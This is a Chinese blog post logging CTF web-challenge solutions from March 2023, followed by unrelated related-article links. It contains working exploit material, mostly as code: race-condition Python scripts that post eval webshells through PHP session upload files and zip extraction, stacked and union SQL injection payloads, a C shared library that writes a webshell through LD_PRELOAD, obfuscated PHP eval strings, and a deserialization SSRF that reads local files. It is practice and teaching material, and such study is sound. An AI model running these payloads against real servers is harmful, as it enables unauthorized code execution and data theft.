刷题记录(2023.3.14 - 2023.3.18)
[第五空间 2021]EasyCleanup
临时文件包含考点
分析源码,两个特殊的点,一个是 eval
,另一个是 include
eval 经过了 strlen filter checkNums 三个函数
include 经过了 strlen filter 两个函数
filter
检测是否包含特定的关键字或字符
function filter($var){ $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; foreach($banned as $ban){ if(strstr($var, $ban)) return True; } return False;
}
checkNums
检查字母和数字的数量
看一下这道题的 PHP 版本 PHP/5.5.9-1
PHP 5.4 后 session.upload_progress 内置函数被引入,如果开启可以使用其工作原理
工作原理: 在上传文件时,将上传进度信息存储在 PHP 的 $_SESSION 变量中。然后可以使用 session_upload_progress() 函数来访问这些信息,以便在用户界面中显示上传进度条或其他信息。
查看 php 配置
?mode=eval
phpinfo关于session的设置session.save_path = /tmp
session.use_strict_mode = Off
session.upload_progress.cleanup = On
session.upload_progress.enabled = On
......
脚本包含
import ioimport requests
import threading # 多线程from cffi.backend_ctypes import xrangesessid = '0'
target = 'http://1.14.71.254:28592/'
file = 'ph0ebus.txt' # 上传文件名
f = io.BytesIO(b'a' * 1024 * 50) # 文件内容,插入大量垃圾字符来使返回的时间更久,这样临时文件保存的时间更长def write(session):while True:session.post(target, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'},files={'file': (file, f)}, cookies={'PHPSESSID': sessid})def read(session):while True:resp = session.post(f"{target}?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');")if file in resp.text:print(resp.text)event.clear()else:print("[+]retry")# print(resp.text)if __name__ == "__main__":event = threading.Event()with requests.session() as session:for i in xrange(1, 30): # 每次调用返回其中的一个值,内存空间使用极少,因而性能非常好threading.Thread(target=write, args=(session,)).start()# target:在run方法中调用的可调用对象,即需要开启线程的可调用对象,比如函数或方法;args:在参数target中传入的可调用对象的参数元组,默认为空元组()for i in xrange(1, 30):threading.Thread(target=read, args=(session,)).start()event.set()
[鹏城杯 2022]压缩包
分析源码
<?php
highlight_file(__FILE__);function removedir($dir){$list= scandir($dir);foreach ($list as $value) {if(is_file($dir.'/'.$value)){unlink($dir.'/'.$value);}else if($value!="."&&$value!=".."){removedir($dir.'/'.$value);}}
}function unzip($filename){$result = [];$zip = new ZipArchive();$zip->open($filename);$dir = $_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename);if(!is_dir($dir)){mkdir($dir);}if($zip->extractTo($dir)){foreach (scandir($dir) as $value) {$file_ext=strrchr($value, '.');$file_ext=strtolower($file_ext); //转换为小写$file_ext=str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA$file_ext=trim($file_ext); //收尾去空if(is_dir($dir."/".$value)&&$value!="."&&$value!=".."){removedir($dir);}if(!preg_match("/jpg|png|gif|jpeg/is",$file_ext)){if(is_file($dir."/".$value)){unlink($dir."/".$value);}else{if($value!="."&&$value!="..")array_push($result,$value);}}}$zip->close();unlink($filename);return json_encode($result);}else{return false;}}
$content= $_REQUEST['content'];
shell_exec('rm -rf /tmp/*');
$fpath ="/tmp/".md5($content);
file_put_contents($fpath, base64_decode($content));
echo unzip($fpath);?>
第一种:
用 yu22x 师傅博客的脚本直接打,因为环境问题可能会打不通
import requests
import hashlib
import threading
import base64url = "http://1.14.71.254:28451/"
sess=requests.session()
r = open("1.zip", "rb").read()
content = base64.b64encode(r)
data={'content': content
}
m=hashlib.md5(content)
md=hashlib.md5(('/tmp/'+str(m.digest().hex())).encode())
def write(session):while True:resp=session.post(url,data=data)
def read(session):while True:resp=session.get(url+f'static/upload/{md}/1.php')if resp.status_code==200:print("success")
if __name__=="__main__":event = threading.Event()with requests.session() as session:for i in range(1, 30):threading.Thread(target=write, args=(session,)).start()for i in range(1, 30):threading.Thread(target=read, args=(session,)).start()event.set()
第二种:
共两个文件,一个 PHP webshell 文件 a.php,一个文本文件 b.txt
结构:
压缩包
├─ a.php
├─ b.txt
└─ shell.zip
准备两个文件,一个PHP文件1.php,一个文本文件2.txt,其中1.php是webshell
然后将这两个文件压缩成 shell.zip,然后使用010编辑器把压缩包打开,把 b.txt 改成对应斜杠的名,这种命名方式在 Linux 下会报错,所以在解压完 a.php 后会报错,不会执行删除操作,则 a.php 就留在服务器上了
?content=UEsDBBQAAAAIAAijc1YqE230GgAAABgAAAAFAAAAYS5waHCzsS/IKFBILUvM0VCJD/APDok2jNW0trcDAFBLAwQUAAAAAAAYo3NW0mNIiAMAAAADAAAABQAAAC8vLy8vMTIzUEsBAhQAFAAAAAgACKNzVioTbfQaAAAAGAAAAAUAJAAAAAAAAAAgAAAAAAAAAGEucGhwCgAgAAAAAAABABgAp0J4t11a2QG64YK3XVrZAW9FlD5dWtkBUEsBAhQAFAAAAAAAGKNzVtJjSIgDAAAAAwAAAAUAJAAAAAAAAAAgAAAAPQAAAC8vLy8vCgAgAAAAAAABABgALJnXyl1a2QGw3TDLXVrZAcitdENdWtkBUEsFBgAAAAACAAIArgAAAGMAAAAAAA==
参考文章:
https://blog.csdn.net/miuzzx/article/details/125576866
http://www.hackdig.com/07/hack-710909.htm
[强网杯 2019]随便注
注入题
?inject=1'error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
?inject=1' selectreturn preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
用堆叠注入
查库
?inject=-1';show databases;
array(1) {[0]=>string(11) "ctftraining"
}array(1) {[0]=>string(18) "information_schema"
}array(1) {[0]=>string(5) "mysql"
}array(1) {[0]=>string(18) "performance_schema"
}array(1) {[0]=>string(9) "supersqli"
}array(1) {[0]=>string(4) "test"
}
查所有的表格
?inject=-1';show tables;
array(1) {[0]=>string(16) "1919810931114514"
}array(1) {[0]=>string(5) "words"
}
?inject=-1';show columns from `1919810931114514`;array(6) {[0]=>string(4) "flag"[1]=>string(12) "varchar(100)"[2]=>string(2) "NO"[3]=>string(0) ""[4]=>NULL[5]=>string(0) ""
}索引为0的元素:列的名称,"flag"索引为1的元素:列的数据类型,"varchar(100)",一个最长长度为100的字符串类型索引为2的元素:列是否允许为空,"NO",不允许为空索引为3的元素:列的默认值索引为4的元素:列是否为自增长的,此处为 NULL,不是自增长列索引为5的元素:列的注释
到这有四种方法获取 flag
第一种:
通过预编译的方式拼接 select 关键字:
1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#
第二种:
直接将下面的语句进行16进制编码
select * from `1919810931114514`
得
73656c656374202a2066726f6d20603139313938313039333131313435313460
1';PREPARE hacker from 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;EXECUTE hacker;#
定义一个变量并将 sql 语句初始化,然后调用
1';Set @jia = 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE hacker from @jia;EXECUTE hacker;#
第三种:
输入 1 后,即显示 id 为1的数据,猜测默认显示的是 words 表的数据
查看words表结构第一个字段名为 id,然后把 words 表改成 words1(区分即可),然后把 1919810931114514 表改成 words,再把列名 flag 改成 id
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
最后
1' or 1 = 1 #
第四种:
1';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;
参考文章:
https://zhuanlan.zhihu.com/p/545713669
[虎符CTF 2022]ezphp
考点:Nginx 在后端 Fastcgi 响应过大 或 请求正文 body 过大时会产生临时文件。如果打开一个进程打开了某个文件,某个文件就会出现在 /proc/PID/fd/ 目录下,我们可以通过重复发包so造成文件缓存,然后用 LD_PRELOAD 去加载我们这个动态链接库
exp.so
#include <stdlib.h>
#include <stdio.h>
#include <string.h>__attribute__ ((__constructor__)) void angel (void){unsetenv("LD_PRELOAD");system("echo \"<?php eval(\\$_POST[cmd]);?>\" > /var/www/html/shell.php");
}
编译
gcc -shared -fPIC exp.c -o exp.so
exp.py
import threading, requests
URL2 = f'http://192.168.56.5:7005/index.php'
nginx_workers = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]
done = Falsedef uploader():print('[+] starting uploader')with open("exp.so","rb") as f:data1 = f.read()+b'0'*1024*1000#print(data1)while not done:requests.get(URL2, data=data1)
for _ in range(16):t = threading.Thread(target=uploader)t.start()
def bruter(pid):global donewhile not done:print(f'[+] brute loop restarted: {pid}')for fd in range(4, 32):try:requests.get(URL2, params={'env': f"LD_PRELOAD=/proc/{pid}/fd/{fd}"})except:passfor pid in nginx_workers:a = threading.Thread(target=bruter, args=(pid, ))a.start()
访问生成的临时 shell
URL/shell.php
POST cmd=system(“cat /*”);
得到 flag
参考文章:
2022虎符CTF-ezphp分析
hxp CTF 2021 跳跳糖社区
唯独你没懂战队 wp
[鹏城杯 2022]简单的php
<?php
show_source(__FILE__);$code = $_GET['code'];if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){die(' Hello');}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){@eval($code);}?>
!%FF被用作内部函数之间的隔离符。这是因为在 URL 编码中,%FF通常是被认为是无效字符的,因为它超出了 ASCII 字符集的范围。因此,使用!%FF作为隔离符可以确保函数调用中的字符不会被错误地解析或转换。
同理可以使用的也有 %8F 等,ASCII 字符集的范围 0-127
取反构造
?code=[~%8c%86%8c%8b%9a%92][!%FF]([~%9c%8a%8d%8d%9a%91%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
[网鼎杯 2018]Fakebook
注册 admin 登录成功,很像 sql 的表
username 超链接点进去后在页面没有什么特殊的点,但是 URL 有个 no 参数
?no=1'
[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66
查字段
1 order by 4
无报错
1 order by 5
报错
union select
被过滤,包括空格
-1 union/**/select 1,2,3,4
网页内容左上角报错信息有反序列化函数 unserialize()
查表
-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database();
username age blogusers
查列
-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database();
username age blogno,username,passwd,data
查询 users 表对应的数据
-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users;
username1admin3c9909afec25354d551dae21590bb26e38d53f2173b8d3dc3eee4c047e7ab1c1eb8b85103e3be7ba613b31bb5c9c36214dc9f14a42fd7a2fdb84856bca5c44c2O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:7:"3333.cn";}
这是我的注册信息,所以没用,得找其他方法
扫描后台可扫到 user.php.bak
<?php
highlight_file(__FILE__);class UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}
根据之前的反序列化函数可知,注册信息被序列化后又被反序列化显示出来,而下方的 data 字段存在漏洞,其对应网页的博客内容
使用 sql 的 4 字段对应的 data 修改序列化内容
file:///var/www/html/flag.php
O:8:"UserInfo":3:{s:4:"name";s:10:"admin123ad";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}
对应的 sql 语句
-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:10:"admin123ad";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
访问链接,查看源码
[RoarCTF 2019]Easy Java
点击 help 后,java 程序错误
且 URL/Download?filename=help.docx
存在 WEB-INF/web.xml
泄露
WEB-INF 是 Java 的 WEB 应用的安全目录。如果想在页面中直接访问其中的文件,必须通过 web.xml 文件对要访问的文件进行相应映射才能访问。
WEB-INF 主要包含一下文件或目录:
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。 /WEB-INF/database.properties:数据库配置文件
Servlet(Server Applet)是Java Servlet的简称,称为小服务程序或服务连接器,用Java编写的服务器端程序,具有独立于平台和协议的特性,主要功能在于交互式地浏览和生成数据,生成动态Web内容。
<servlet> 标签定义了一个 Servlet。<servlet-name> 标签定义了 Servlet 的名字。<servlet-class> 标签定义了 Servlet 的类名。<servlet-mapping> 标签将 Servlet 映射到一个 URL。<url-pattern> 标签定义了 URL 的模式,该 URL 模式将请求映射到相应的 Servlet。对于每个 Servlet,都有相应的 <servlet> 和 <servlet-mapping> 来进行定义和映射。
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
解码得
[NPUCTF2020]ezinclude
首页直接报错,源码中有信息
<html>
<!-- md5($secret.$name)===$pass -->
</html>
测试后,GET 可传 name,且其参数变化后 Set-Cookie 中的 Hash 值会变化,传入对应的 name,即有对应的 pass 值
?pass=fa25e54758d5d5c1927781a6ede89f8a
<script language="javascript" type="text/javascript">window.location.href="flflflflag.php";</script>
<html>
<!--md5($secret.$name)===$pass -->
</html>
/flflflflag.php?file=php://filter/convert.base64-encode/resource=flflflflag.php
flflflflag.php
<html>
<head>
<script language="javascript" type="text/javascript">window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
dir.php
<?php
var_dump(scandir('/tmp'));
?>
在 PHP 7 中,如果存在内存错误或其他类似的问题,可能会导致段错误(segment fault),可能会导致 PHP 异常崩溃退出。这种情况可能会在尝试处理大量数据或处理超出内存限制的数据时发生。如果向 PHP 发送包含文件区块的数据包时,PHP 异常崩溃退出,但是 POST 的临时文件仍被保留
使用脚本发送包含文件区块的数据包
import requests
from io import BytesIO #BytesIO实现了在内存中读写bytes
payload = "<?php eval($_POST[cmd]);?>"
data={'file': BytesIO(payload.encode())}
url="http://366904a9-c0cd-4a65-8b3a-77b6adb8021f.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
r=requests.post(url=url,files=data,allow_redirects=False)
本文脚本均来自网上收集,代码持续完善分析中…
刷题记录(2023.3.14 - 2023.3.18)相关推荐
- 重走长征路---OI每周刷题记录---6月14日 2014
总目录详见https://blog.csdn.net/mrcrack/article/details/84471041 做题原则,找不到测评地址的题不做.2018-11-28 重走长征路---OI每周 ...
- LeetCode刷题记录14——257. Binary Tree Paths(easy)
LeetCode刷题记录14--257. Binary Tree Paths(easy) 目录 前言 题目 语言 思路 源码 后记 前言 数据结构感觉理论简单,实践起来很困难. 题目 给定一个二叉树, ...
- 力扣刷题记录--哈希表相关题目
当遇到需要快速判断一个元素是否出现在集合里面的时候,可以考虑哈希法,牺牲一定的空间换取查找的时间. java常用的哈希表有HashMap.HashSet以及用数组去模拟哈希,这几种方法各有优劣. 数组 ...
- Codeforces 刷题记录(已停更)
Codeforces 每日刷题记录 (已停更) 打'+'是一些有启发意义的题目,部分附上一句话题解,每日更新3题,大部分题目较水. Day ID Problem Tutorial Note 1 1 + ...
- BZOJ刷题记录---提高组难度
BZOJ刷题记录---提高组难度 总目录详见https://blog.csdn.net/mrcrack/article/details/90228694 序号 题号 算法 思想难度 实现难度 总难度 ...
- BUUCTF-2020寒假刷题记录
BUUCTF-2020寒假刷题记录 Web [RoarCTF 2019]Easy Calc 打开源码,看到calc.php,打开看到源码. 在 num 前面加个空格即可绕过 ? num=phpinfo ...
- 算法笔记CodeUp第一至第六章刷题记录
文章目录 <算法笔记>2.2小节--C/C++快速入门->顺序结构 1.例题1-1-1 按要求输出信息(1) 2.例题1-1-2 按要求输出信息(2) 3.例题1-2-1 求两个整数 ...
- 蓝桥杯官网刷题记录python
蓝桥杯官网刷题记录python 由于很多题都会在2020.2021.2022年省赛出现,有的在前面文章里做过的这里就不会再说了 一.空间 小蓝准备用 256MB 的内存空间开一个数组,数组的每个元素都 ...
- Pythontip刷题记录
pythontip 刷题记录 11.给你一个正整数列表 L, 输出L内所有数字的乘积末尾0的个数.(提示:不要直接相乘,数字很多,相乘得到的结果可能会很大). 不能直接相乘会太大了,分解质因数,去找2 ...
- 【刷题记录①】Java从0到1入门|基础知识巩固练习
JAVA从0到1入门刷题记录 目录 一.类型转换 二.简单运算 三.四舍五入 四.交换变量值 五.计算商场折扣 六.判断体重指数 总结 我几乎每天都会刷题训练来使自己对各种算法随时保持一个清晰的状态. ...
最新文章
- 4.9---4.16总结
- jdk5.0新特性—— 枚举
- Android模拟器Genymotion安装apk
- LInux 下安装 python notebook 及指向路径,运行计时,炫酷的深蓝午夜主题,本地登陆远程服务器
- 【H.264/AVC视频编解码技术】第二章【H264码流分析】
- poj 3310(并查集判环,图的连通性,树上最长直径路径标记)
- datax 定时执行多个job_数据同步神器Datax源码重构
- mysql支持多语言_多种语言连接MySQL-Go语言中文社区
- window 创建python虚拟环境
- java读取json文件
- 用unity制作简单的AR,亲测有效
- H5 自定义生成海报
- kubernetes 安装 Dashboard
- 【NLP】第12章 检测客户情绪以做出预测
- 机器学习入坑姿势之大纲
- 适合Web开发人员的10个CSS代码生成器
- matlab已知随机变量分布律求期望/已知概率密度求期望与方差
- 由MessageBox透视Win32 API的调用
- nginx Proxy 代理
- java 谷歌身份验证器
热门文章
- 让python飞:形象理解python 列表、元组、字典、集合、运算符
- 脚踝扭伤处理及恢复方法
- 《扬帆优配》机构关注目标锁定,27股获扎堆评级,8股获机构上调评级
- NW.js的helloworld
- spring(六)AOP
- 遭遇auto.exe,Hack.ArpCheater.a(ARP欺骗工具),Trojan.PSW.ZhengTu等2
- 片内、片外、ROM、RAM
- 关于MSN一些异常的解决方案
- 数据结构——有序顺序表的合并
- 老师教我们用计算机画画,感恩老师的广播稿200字